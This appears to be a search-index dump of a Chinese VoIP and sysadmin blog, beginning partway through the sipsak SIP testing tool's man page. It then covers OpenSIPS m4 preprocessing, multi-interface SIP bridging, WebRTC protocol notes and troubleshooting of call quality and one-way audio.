$dsthost$ will be replaced by with the host or domainname which is given by the -s parameter. $srchost$ will be replaced by the hostname of the local machine. $port$ will be replaced by the local listening port of sipsak. 
$user$ will be replaced by the username which is given by the -s parameter. -H, --hostname HOSTNAME Overwrites the automatic detection of the hostname with the given parameter. Warning: use this with caution (preferable only if the automatic detection fails). -i, --no-via Deactivates the insertion of the Via line of the localhost. Warning: this probably disables the receiving of the responses from the server. -I, --invite-mode Activates the Invites cycles within the usrloc mode. It should be combined with -U. In this combination sipsak first registeres a user, and then simulates an invitation to this user. First an Invite is sent, this is replied with 200 OK and finally an ACK is sent. This option can also be used without -U , but you should be sure to NOT invite real UAs with this option. In the case of a missing -U the -l PORT is required because only if you made a -U run with a fixed local port before, a run with -I and the same fixed local port can be successful. Warning: sipsak is no real UA and invita‐ tions to real UAs can result in unexpected behaivior. -j, --headers STRING The string will be added as one or more additional headers to the request. The string \u0026#34;\\n\u0026#34; (note: two characters) will be replaced with CRLF and thus result in two separate headers. That way more then one header can be added. -J, --autohash STRING The string will be used as the H(A1) input to the digest authentication response calculation. Thus no password from the -a option is required if this option is provided. The given string is expected to be a hex string with the length of the used hash function. -k, --local-ip STRING The local ip address to be used -l, --local-port PORT The receiving UDP socket will use the local network port. Useful if a file is given by -f which contains a correct Via line. Check the -S option for details how sipsak sends and receives messages. 
-L, --no-crlf De-activates the insertion of carriage returns (\\r) before all line feeds (\\n) (which is not already proceeded by car‐ raige return) if the input is coming from a file ( -f ). Without this option also an empty line will be appended to the request if required. -m, --max-forwards NUMBER This sets the value of the Max-Forward header field. If omitted no Max-Forward field will be inserted. If omitted in the traceroute mode number will be 255. -M, --message-mode This activates the Messages cycles within the usrloc mode (known from sipsak versions pre 0.8.0 within the normal usrloc test). This option should be combined with -U so that a successful registration will be tested with a test message to the user and replied with 200 OK. But this option can also be used without the -U option. Warning: using without -U can cause unexpected behaivor. -n, --numeric Instead of the full qualified domain name in the Via line the IP of the local host will be used. This option is now on by default. -N, --nagios-code Use Nagios comliant return codes instead of the normal sipsak ones. This means sipsak will return 0 if everything was ok and 2 in case of any error (local or remote). -o, --sleep NUMBER sipsak will sleep for NUMBER ms before it starts the next cycle in the usrloc mode. This will slow down the whole test process to be more realistic. Each cycle will be still completed as fast as possible, but the whole test will be slowed down. -O, --disposition STRING The given STRING will be used as the content for the Content-Disposition header. Without this option there will be no Content-Disposition header in the request. -p, --outbound-proxy HOSTNAME[:PORT] the address of the hostname is the target where the request will be sent to (outgoing proxy). Use this if the destination host is different then the host part of the request uri. The hostname is resolved via DNS SRV if supported (see descrip‐ tion for SRV resolving) and no port is given. 
-P, --processes NUMBER Start NUMBER of processes in parallel to do the send and reply checking. Only makes sense if a higher number for -e is given in the usrloc, message or invite mode. -q, --search REGEXP match replies against REGEXP and return false if no match occurred. Useful for example to detect server name in Server header field. -r, --remote-port PORT Instead of the default sip port 5060 the PORT will be used. Alternatively the remote port can be given within the sip uri of the -s parameter. -R, --random-mode This activates the randtrash mode. In this mode OPTIONS requests will be send to server with increasing numbers of ran‐ domly crashed characters within this request. The position within the request and the replacing character are randomly chosen. Any other response than Bad request (4xx) will stop this mode. Also three unresponded sends will stop this mode. With the -t parameter the maximum of trashed characters can be given. -s, --sip-uri SIPURI This mandatory option sets the destination of the request. It depends on the mode if only the server name or also an user name is mandatory. Example for a full SIPURI : sip:test@foo.bar:123 See the note in the description part about SRV lookups for details how the hostname of this URI is converted into an IP and port. -S, --symmetric With this option sipsak will use only one port for sending and receiving messages. With this option the local port for sending will be the value from the -l option. In the default mode sipsak sends from a random port and listens on the given port from the -l option. Note: With this option sipsak will not be able to receive replies from servers with asym‐ metric signaling (and broken rport implementation) like the Cisco proxy. If you run sipsak as root and with raw socket support (check the output from the -V option) then this option is not required because in this case sipsak already uses only one port for sending and receiving messages. 
-t, --trash-chars NUMBER This parameter specifies the maximum of trashed characters in the randtrash mode. If omitted NUMBER will be set to the length of the request. -T, --traceroute-mode This activates the traceroute mode. This mode works like the well known traceroute(8) command expect that not the number of network hops are counted rather the number of server on the way to the destination user. Also the round trip time of each request is printed out, but due to a limitation within the sip protocol the identity (IP or name) can only deter‐ mined and printed out if the response from the server contains a warning header field. In this mode on each outgoing request the value of the Max-Forwards header field is increased, starting with one. The maximum of the Max-Forwards header will 255 if no other value is given by the -m parameter. Any other response than 483 or 1xx are treated as a final response and will terminate this mode. -u, --auth-username STRING Use the given STRING as username value for the authentication (different account and authentication username). -U, --usrloc-mode This activates the usrloc mode. Without the -I or the -M option, this only registers users at a registrar. With one of the above options the previous registered user will also be probed ether with a simulated call flow (invite, 200, ack) or with an instant message (message, 200). One password for all users accounts within the usrloc test can be given with the -a option. An user name is mandatory for this mode in the -s parameter. The number starting from the -b parameter to the -e parameter is appended the user name. If the -b and the -e parameter are omitted, only one runs with the given user‐ name, but without append number to the usernames is done. -v, --verbose This parameter increases the output verbosity. No -v means nearly no output except in traceroute and error messages. The maximum of three v\u0026#39;s prints out the content of all packets received and sent. 
-V, --version Prints out the name and version number of sipsak and the options which were compiled into the binary. -w, --extract-ip Activates the extraction of the IP or hostname from the Warning header field. -W, --nagios-warn NUMBER Return Nagios warn exit code (1) if the number of retransmissions before success was above the given number. -x, --expires NUMBER Sets the value of the Expires header to the given number. -z, --remove-bindings Activates the randomly removing of old bindings in the usrloc mode. How many per cent of the bindings will be removed, is determined by the USRLOC_REMOVE_PERCENT define within the code (set it before compilation). Multiple removing of bind‐ ings is possible, and cannot be prevented. -Z, --timer-t1 Sets the amount of milliseconds for the SIP timer T1. It determines the length of the gaps between two retransmissions of a request on a unreliable transport. Default value is 500 if not changed via the configure option --enable-timeout. RETURN VALUES The return value 0 means that a 200 was received. 1 means something else then 1xx or 2xx was received. 2 will be returned on local errors like non resolvable names or wrong options combination. 3 will be returned on remote errors like socket errors (e.g. icmp error), redirects without a contact header or simply no answer (timeout). If the -N option was given the return code will be 2 in case of any (local or remote) error. 1 in case there have been retrans‐ missions from sipsak to the server. And 0 if there was no error at all. CAUTION Use sipsak responsibly. Running it in any of the stress modes puts substantial burden on network and server under test. EXAMPLES sipsak -vv -s sip:nobody@foo.bar displays received replies. sipsak -T -s sip:nobody@foo.bar traces SIP path to nobody. sipsak -U -C sip:me@home -x 3600 -a password -s sip:myself@company inserts forwarding from work to home for one hour. 
sipsak -f bye.sip -g \u0026#39;!FTAG!345.af23!TTAG!1208.12!\u0026#39; -s sip:myproxy reads the file bye.sip, replaces $FTAG$ with 345.af23 and $TTAG$ with 1208.12 and finally send this message to myproxy LIMITATIONS / NOT IMPLEMENTED Many servers may decide NOT to include SIP \u0026#34;Warning\u0026#34; header fields. Unfortunately, this makes displaying IP addresses of SIP servers in traceroute mode impossible. IPv6 is not supported. Missing support for the Record-Route and Route header. BUGS sipsak is only tested against the SIP Express Router (ser) though their could be various bugs. Please feel free to mail them to the author. AUTHOR Nils Ohlmeier \u0026lt;nils at sipsak dot org\u0026gt; SEE ALSO traceroute(8) ","permalink":"https://wdd.js.org/opensips/tools/sipsak/","summary":"sipsak is a command line tool which can send simple requests to a SIP server. It can run additional tests on a SIP server which are usefull for admins and developers of SIP enviroments.\nhttps://github.com/nils-ohlmeier/sipsak\n安装 apt-get install sipsak 发送options sipsak -vv -p 192.168.2.63:5060 -s sip:8001@test.cc man SIPSAK(1) User Manuals SIPSAK(1) NAME sipsak - a utility for various tests on sip servers and user agents SYNOPSIS sipsak [-dFGhiILnNMRSTUVvwz] [-a PASSWORD ] [-b NUMBER ] [-c SIPURI ] [-C SIPURI ] [-D NUMBER ] [-e NUMBER ] [-E STRING ] [-f FILE ] [-g STRING ] [-H HOSTNAME ] [-j STRING ] [-J STRING ] [-l PORT ] [-m NUMBER ] [-o NUMBER ] [-p HOSTNAME ] [-P NUMBER ] [-q REGEXP ] [-r PORT ] [-t NUMBER ] [-u STRING ] [-W NUMBER ] [-x NUMBER ] -s SIPURI DESCRIPTION sipsak is a SIP stress and diagnostics utility.","title":"sipsak"},{"content":"以前iTerm2有个很贴心的功能,鼠标向下滚动时,相关命令的输出也会自动向下。\n但是不知道最近是升级系统还是升级iTerm2的原因,这个功能实现不了。😭😭😭😭😭😭😭\n例如用vim打开一个大文件,或者使用man去查看一个命令的介绍文档时。如果要想向下滚动命令的输出内容。只能按j或者按空格或者回车。然而按键虽然精确,却没有用触摸板滚动来的爽。\n为了让vim能够接受鼠标向下滚动功能,我也曾设置了 set mouse=a 这个设置虽然可以用触摸板来向下滚屏了,但是也出现了意想不到的问题。\n然后我就去研究iTerm2的配置,发现关于鼠标的配置中,有一个 Scroll wheel send arrow keys when in alternate screen mode , 
把这个值设置为Yes。那么无论Vim, 还是man命令,都可以用触摸板去滚动屏幕了。\n","permalink":"https://wdd.js.org/posts/2020/07/gon16g/","summary":"以前iTerm2有个很贴心的功能,鼠标向下滚动时,相关命令的输出也会自动向下。\n但是不知道最近是升级系统还是升级iTerm2的原因,这个功能实现不了。😭😭😭😭😭😭😭\n例如用vim打开一个大文件,或者使用man去查看一个命令的介绍文档时。如果要想向下滚动命令的输出内容。只能按j或者按空格或者回车。然而按键虽然精确,却没有用触摸板滚动来的爽。\n为了让vim能够接受鼠标向下滚动功能,我也曾设置了 set mouse=a 这个设置虽然可以用触摸板来向下滚屏了,但是也出现了意想不到的问题。\n然后我就去研究iTerm2的配置,发现关于鼠标的配置中,有一个 Scroll wheel send arrow keys when in alternate screen mode , 把这个值设置为Yes。那么无论Vim, 还是man命令,都可以用触摸板去滚动屏幕了。","title":"iTerm2 使用触摸板向下滚动命令输出"},{"content":"Mac上的netstat和Linux上的有不少的不同之处。\n在Linux上常使用\nLinux Mac netstat -nulp netstat -nva -p udp netstat -ntlp netstat -nva -p tcp 注意,在Mac上netstat的-n和linux上的含义相同\n","permalink":"https://wdd.js.org/posts/2020/07/hingbv/","summary":"Mac上的netstat和Linux上的有不少的不同之处。\n在Linux上常使用\nLinux Mac netstat -nulp netstat -nva -p udp netstat -ntlp netstat -nva -p tcp 注意,在Mac上netstat的-n和linux上的含义相同","title":"mac上netstat命令"},{"content":"opensips在多实例时,会有一些数据同步策略的问题。\n~\n","permalink":"https://wdd.js.org/opensips/ch5/db-mode/","summary":"opensips在多实例时,会有一些数据同步策略的问题。\n~","title":"[todo] db_mode调优"},{"content":"相比于kamailio的脚本的预处理能力,opensips的脚本略显单薄。OpenSIPS官方也认识到了这一点,但是也并未准备如何提高这部分能力。因为OpenSIPS是想将预处理交给这方面的专家,也就是大名鼎鼎的m4(当然,你可能根本不知道m4是啥)。\n举例来说 我们看一下opensips自带脚本中的一小块。 里面就有三个要配置的地方\n这个listen的地址: listen=udp:127.0.0.1:5060 数据库地址的配置:modparam(\u0026ldquo;usrloc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;dbdriver://username:password@dbhost/dbname\u0026rdquo;) 数据库地址的配置:modparam(\u0026ldquo;acc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;mysql://user:password@localhost/opensips\u0026rdquo;) auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME mpath=\u0026#34;/usr/local//lib/opensips/modules/\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;dbdriver://username:password@dbhost/dbname\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) 
modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://user:password@localhost/opensips\u0026#34;) 随着脚本代码的增多,各种配置往往越来越多。真实脚本里,配置的地方远远不止三处!\n你开发了OpenSIPS的脚本,但是真正部署服务的可能是其他人。那么其他人拿到你的脚本的时候,他们怎么知道要改哪些地方呢,难道要搜索一下,所有出现#CUSTOMIZE ME的地方就是需要配置的? 难道他们每次部署一个服务,就要改一遍脚本的内容? 改错了谁负责?\n如果你不想被运维人员在背后骂娘,就不要把配置性的数据写死到脚本里!\n如果你不想在打游戏的时候被运维人员打电话问这个配置出错应该怎么解决,就不要把配置型数据写死到脚本里!\n** 那么,你就需要用到M4**\n什么是M4? M4是一种宏语言,如果你不清楚什么是宏,你就可以把M4想象成一种字符串替换的工具。\n如何安装M4? 大部分Linux上都已经默认安装了m4, 你可以用m4 --version检查一下m4是否已经存在。\nm4 --version Copyright © 2021 Free Software Foundation, Inc. GPLv3+ 许可证: GNU 通用公共许可证第三版或更高版本 \u0026lt;https://gnu.org/licenses/gpl.html\u0026gt;。 这是自由软件: 您可自由更改并重新分发它。 在法律所允许的范围内,不附带任何担保条款。 如果不存在的话,可以用对应常用的包管理工具来安装,例如\napt-get install m4 能否举个m4例子? hello-world.m4\ndefine(`hello_world\u0026#39;, `你好,世界\u0026#39;) 小王说: hello_world 然后执行: m4 hello-world.m4\n小王说: 你好,世界 效果就是 hello_world这个字符串,被我们定义的字符串给替换了。\n为什么要做预处理? 
我管理过的OpenSIPS脚本,最长的大概有1500行左右。刚开始接手的时候,我花了很长时间才理清脚本的功能。\n这个脚本存在的问题是:\n大段的逻辑都集中在请求路由中,功能比较缠绕,很容易改动一个地方,导致不可预测的问题 配置性的变量和脚本融合在一起,脚本迁移时,要改动的地方比较多,容易出错 某些环境需要某些功能,某些环境又不需要某些功能,很难做到兼容,结果就导致脚本的版本太多,难以维护 处理的目标\n将比较大的请求路由,按照功能划分多个子路由,专注处理功能内部的事情,做到高内聚,低耦合。可以使用m4的include指令,将多个文件引入到一个文件中。其实OpenSIPS本身也有类似的指令,include_file,但是这个指令并不会在运行前生成一个统一的目标文件,有时候出错,不好排查问题出现的代码行。另外Include的文件太多,也不好维护。 将配置性变量,定义成m4的宏,由m4负责统一的宏展开。配置文件可以单独拿出来,也可以由m4的命令行参数传入。 关于不同环境的差异化编译,可以使用m4的条件语句。例如当某个宏定义时展开某个语句,或者某个宏的值等于某个值后,再include某个文件。这样就可以做到条件展开和条件引入。 ","permalink":"https://wdd.js.org/opensips/ch5/m4/","summary":"相比于kamailio的脚本的预处理能力,opensips的脚本略显单薄。OpenSIPS官方也认识到了这一点,但是也并未准备如何提高这部分能力。因为OpenSIPS是想将预处理交给这方面的专家,也就是大名鼎鼎的m4(当然,你可能根本不知道m4是啥)。\n举例来说 我们看一下opensips自带脚本中的一小块。 里面就有三个要配置的地方\n这个listen的地址: listen=udp:127.0.0.1:5060 数据库地址的配置:modparam(\u0026ldquo;usrloc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;dbdriver://username:password@dbhost/dbname\u0026rdquo;) 数据库地址的配置:modparam(\u0026ldquo;acc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;mysql://user:password@localhost/opensips\u0026rdquo;) auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME mpath=\u0026#34;/usr/local//lib/opensips/modules/\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;dbdriver://username:password@dbhost/dbname\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://user:password@localhost/opensips\u0026#34;) 随着脚本代码的增多,各种配置往往越来越多。真实脚本里,配置的地方远远不止三处!\n你开发了OpenSIPS的脚本,但是真正部署服务的可能是其他人。那么其他人拿到你的脚本的时候,他们怎么知道要改哪些地方呢,难道要搜索一下,所有出现#CUSTOMIZE ME的地方就是需要配置的? 难道他们每次部署一个服务,就要改一遍脚本的内容? 
改错了谁负责?\n如果你不想被运维人员在背后骂娘,就不要把配置性的数据写死到脚本里!\n如果你不想在打游戏的时候被运维人员打电话问这个配置出错应该怎么解决,就不要把配置型数据写死到脚本里!\n** 那么,你就需要用到M4**\n什么是M4? M4是一种宏语言,如果你不清楚什么是宏,你就可以把M4想象成一种字符串替换的工具。\n如何安装M4? 大部分Linux上都已经默认安装了m4, 你可以用m4 --version检查一下m4是否已经存在。\nm4 --version Copyright © 2021 Free Software Foundation, Inc. GPLv3+ 许可证: GNU 通用公共许可证第三版或更高版本 \u0026lt;https://gnu.org/licenses/gpl.html\u0026gt;。 这是自由软件: 您可自由更改并重新分发它。 在法律所允许的范围内,不附带任何担保条款。 如果不存在的话,可以用对应常用的包管理工具来安装,例如\napt-get install m4 能否举个m4例子? hello-world.","title":"使用m4增强opensips.cfg脚本预处理能力"},{"content":"There are scenarios where you need OpenSIPS to route SIP traffic across more than one IP interface. Such a typical scenario is where OpenSIPS is required to perform bridging. The bridging may be between different IP networks (like public versus private, IPv4 versus IPv6) or between different transport protocols for SIP (like UDP versus TCP versus TLS).So, how do we switch to a different outbound interface in OpenSIPS ?\nAuto detection OpenSIPS has a built in automatic way of picking up the right outbound interface, the so called “Multi homed” support or shortly “mhomed”, controlled by the mhomed core parameter.The auto detection is done based on the destination IP of the SIP message. OpenSIPS will ‘query’ the kernel routing table to see which interface (on the server) is able to route to the needed destination IP.\nExample If we have an OpenSIPS listening on 1.2.3.4 public interface and 10.0.0.4 private interface and we need to send the SIP message to 10.0.0.100, the kernel will indicate that 10.0.0.100 is reachable/routable only via 10.0.0.4, so OpenSIPS will use that listener.\nAdvantages This is a very easy way to achieve multi-interface routing, without any extra scripting logic. 
You just have to switch a single option and it simply works.\nDisadvantages First of all there is performance penalty here as each time a SIP message is sent out OpenSIPS will have to query the kernel for the right outbound interface.Also there are some limitation – as this auto detection is based on the kernel routing table, this approach can be used only when routing between different types of networks like private versus public or IPv4 versus IPv6. It cannot be used for switching between different SIP transport protocols.Even more, there is another limitation here – you need to correlate the kernel IP routing table with the listeners you have in OpenSIPS, otherwise you may end up in a situation where the kernel indicates as outbound interface an IP that it is not configured as listener in OpenSIPS!\nManual selection An alternative is to explicitly indicate to OpenSIPS what the outbound interface should be, based on the logic from the routing script. Like if my routing logic says that the call is to be sent to an end-point and I know that all my end-points are on the public network, then I can manually indicate OpenSIPS to use the listener on the public network. Or if my routing logic says that the call goes to a media server located in a private network, then I will instruct OpenSIPS to use the private listener.How do you do this? You can indicate the outbound interface/socket by “forcing the send socket” with the $fs variable.As the send socket description also contains indication for the transport protocol, this approach can be used for switching between different SIP transport protocols:\n# switch from TCP to UDP, preserving the IP if ($proto == \u0026#34;TCP\u0026#34;) $fs = \u0026#34;udp:\u0026#34; + $Ri + \u0026#34;:5060\u0026#34;; Manually setting the outbound interface is usually done only for the initial requests (without the To header “;tag=” parameter). Why? 
As you have to anchor the dialog into your OpenSIPS (otherwise the sequential requests will not be routed in bridging mode), you will do either record_route(), either topology_hiding(). These two ways of anchoring dialogs in OpenSIPS guarantees that all sequential requests will follow the same interface switching / bridging as the initial request. Like if you do the interface switch at INVITE time, there is no need for additional scripting for in-dialog requests (ACK, re-INVITE, BYE, etc.). Shortly, any custom interface handling is to be done only for the initial requests.\nExample Assuming the end-points are in the public interface and the media servers are in the private network, let’s see how the logic should be.But first, an useful hint : if your routing is based on lookup(“location”), there is no need to do manual setting of the outbound interface as the lookup() function will do this for you – it will automatically force as outbound interface the interface the corresponding REGISTER was received on ;).\n# is it a call to a media service (format *33xxxxx) ? if ($rU=~\u0026#34;^*33[0-9]+$\u0026#34;)) { $fs = \u0026#34;udp:10.0.0.100:5060\u0026#34;; route(to_media); exit; } Advantages This is a very rigorous way of controlling the interface switching in your OpenSIPS script, being able to cover all cases of network or protocol switching.Also, this adds zero performance penalty!\nDisadvantages You need to do some extra scripting and to correlate your SIP routing logic with the IP/transport switching logic. Nevertheless, it is very easy to do – just set a variable, so it will not pollute your script.\nConclusions Each approach has some clear advantages – if the auto-detection is very very simple to use for some simple scenarios, the manual selection is more powerful and complex but needs some extra scripting and SIP understanding.If you want to learn more, join us for the upcoming OpenSIPS Bootcamp training session and become a skillful OpenSIPS user! 
:).\n原文地址:https://blog.opensips.org/2018/09/04/sip-bridging-over-multiple-interfaces/\n","permalink":"https://wdd.js.org/opensips/blog/mutltiple-interface/","summary":"There are scenarios where you need OpenSIPS to route SIP traffic across more than one IP interface. Such a typical scenario is where OpenSIPS is required to perform bridging. The bridging may be between different IP networks (like public versus private, IPv4 versus IPv6) or between different transport protocols for SIP (like UDP versus TCP versus TLS).So, how do we switch to a different outbound interface in OpenSIPS ?\nAuto detection OpenSIPS has a built in automatic way of picking up the right outbound interface, the so called “Multi homed” support or shortly “mhomed”, controlled by the mhomed core parameter.","title":"SIP bridging over multiple interfaces"},{"content":"curl ip.sb curl cip.cc ","permalink":"https://wdd.js.org/posts/2020/07/bh7hy0/","summary":"curl ip.sb curl cip.cc ","title":"获取本机外部公网IP"},{"content":"标准文档 WebRTC https://w3c.github.io/webrtc-pc/ MediaStream https://www.w3.org/TR/mediacapture-streams/ 实现接口 MediaStream: 获取媒体流,例如从用户的摄像机或者麦克风 RTCPeerConnection: 音频或者视频呼叫,以及加密和带宽管理 RTCDataChannel: 端到端的数据交互 WebRTC架构 架构图颜色标识说明:\n紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的。\n其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制\nDTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 
是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释\nICE:互动式连接建立(RFC 5245) STUN:用于NAT的会话遍历实用程序(RFC 5389) TURN:在NAT周围使用中继进行遍历(RFC 5766) SDP:会话描述协议(RFC 4566) DTLS:数据报传输层安全性(RFC 6347) SCTP:流控制传输协议(RFC 4960) SRTP:安全实时传输协议(RFC 3711) ","permalink":"https://wdd.js.org/fe/webrtc-notes/","summary":"标准文档 WebRTC https://w3c.github.io/webrtc-pc/ MediaStream https://www.w3.org/TR/mediacapture-streams/ 实现接口 MediaStream: 获取媒体流,例如从用户的摄像机或者麦克风 RTCPeerConnection: 音频或者视频呼叫,以及加密和带宽管理 RTCDataChannel: 端到端的数据交互 WebRTC架构 架构图颜色标识说明:\n紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的。\n其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制\nDTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释","title":"Webrtc Notes"},{"content":"通话质量差,一般可能与以下因素有关。\n媒体服务器或者媒体代理服务器CPU, 内存异常 通信网络差 中继或者网关送过来的本来音质就不好。 解决思路:\n这个需要监控媒体服务器或者媒体代理CPU,内存是否正常 也可以在媒体代理上用tcpdump抓包,然后用wireshark分析 调听服务端的录音,看看服务端录音是否也存在音质差的问题 ","permalink":"https://wdd.js.org/opensips/ch7/poor-quality/","summary":"通话质量差,一般可能与以下因素有关。\n媒体服务器或者媒体代理服务器CPU, 内存异常 通信网络差 中继或者网关送过来的本来音质就不好。 解决思路:\n这个需要监控媒体服务器或者媒体代理CPU,内存是否正常 也可以在媒体代理上用tcpdump抓包,然后用wireshark分析 调听服务端的录音,看看服务端录音是否也存在音质差的问题 
","title":"通话质量差"},{"content":" 这个问题很大可能和SDP没有正确修改有关。需要排查SIP信令的sdp地址是否正确。 防火墙策略问题:有的网络允许udp出去,但是不允许udp进来。需要设置防火墙策略。 udp端口范围太小。一般一个通话需要占用4个udp端口。如果开放的udp端口太少,在通话达到一定数量后,就会出现一部分呼叫没有可用端口。 用户设备的问题。例如用户的电脑声卡或者扬声器出现问题。 由于网络的复杂性,还有很多可能 一般遇到这个问题,可以按照如下的思路排查:\n服务端有录音功能的,可以先在服务端听录音,看看服务端录音里是否正常。一般来说有四种情况。 两方的录音都没有 主叫方有,被叫方没有 被叫方有,主叫方没有 主被叫都有。但是就是一方听不到另一方。 通过排查服务端的录音,就可以大致知道到底是AB两个leg, 每个leg上的语音流收发的情况。\n从信令的sdp中分析,这个需要一定的SIP协议的分析能力。有些时候,sdp里面的媒体地址不正确,也会导致媒体流无法正常收发。 NAT策略。NAT一般有四种,用的比较多的是端口限制型。这种NAT要求外网流量在进入NAT内部时,必须先有内部的流量出去。当内部流量出去之后,这个NAT洞才会出现,外部的流量才能从这个洞进入。如果NAT内部设备一直不发送rtp包,那么外部的流量即使进来,也会被防火墙拦截掉。 无论是运维人员还是开发人员,在遇到媒体流问题时,一定要先搞清楚整个软交换的网络拓扑架构。否则只能南辕北辙。 sngrep -cr, 加上r这个参数,可以实时观察媒体流的流动情况。是个非常好的功能。但是对于那种加密的媒体流,sngrep是抓不到的,这点要注意。常见的WebRTC的媒体流就是加密的。 最终如果还是解决不了,那么只能祭出最后的杀器:tcpdump + wireshark。服务端抓包的话,虽然sngrep可以抓包,但是比较浪费内存还可能会出现丢包。最好用tcpdump抓包成文件,然后在wireshark上分析。 ","permalink":"https://wdd.js.org/opensips/ch7/one-leg-audio/","summary":" 这个问题很大可能和SDP没有正确修改有关。需要排查SIP信令的sdp地址是否正确。 防火墙策略问题:有的网络允许udp出去,但是不允许udp进来。需要设置防火墙策略。 udp端口范围太小。一般一个通话需要占用4个udp端口。如果开放的udp端口太少,在通话达到一定数量后,就会出现一部分呼叫没有可用端口。 用户设备的问题。例如用户的电脑声卡或者扬声器出现问题。 由于网络的复杂性,还有很多可能 一般遇到这个问题,可以按照如下的思路排查:\n服务端有录音功能的,可以先在服务端听录音,看看服务端录音里是否正常。一般来说有四种情况。 两方的录音都没有 主叫方有,被叫方没有 被叫方有,主叫方没有 主被叫都有。但是就是一方听不到另一方。 通过排查服务端的录音,就可以大致知道到底是AB两个leg, 每个leg上的语音流收发的情况。\n从信令的sdp中分析,这个需要一定的SIP协议的分析能力。有些时候,sdp里面的媒体地址不正确,也会导致媒体流无法正常收发。 NAT策略。NAT一般有四种,用的比较多的是端口限制型。这种NAT要求外网流量在进入NAT内部时,必须先有内部的流量出去。当内部流量出去之后,这个NAT洞才会出现,外部的流量才能从这个洞进入。如果NAT内部设备一直不发送rtp包,那么外部的流量即使进来,也会被防火墙拦截掉。 无论是运维人员还是开发人员,在遇到媒体流问题时,一定要先搞清楚整个软交换的网络拓扑架构。否则只能南辕北辙。 sngrep -cr, 加上r这个参数,可以实时观察媒体流的流动情况。是个非常好的功能。但是对于那种加密的媒体流,sngrep是抓不到的,这点要注意。常见的WebRTC的媒体流就是加密的。 最终如果还是解决不了,那么只能祭出最后的杀器:tcpdump + wireshark。服务端抓包的话,虽然sngrep可以抓包,但是比较浪费内存还可能会出现丢包。最好用tcpdump抓包成文件,然后在wireshark上分析。 
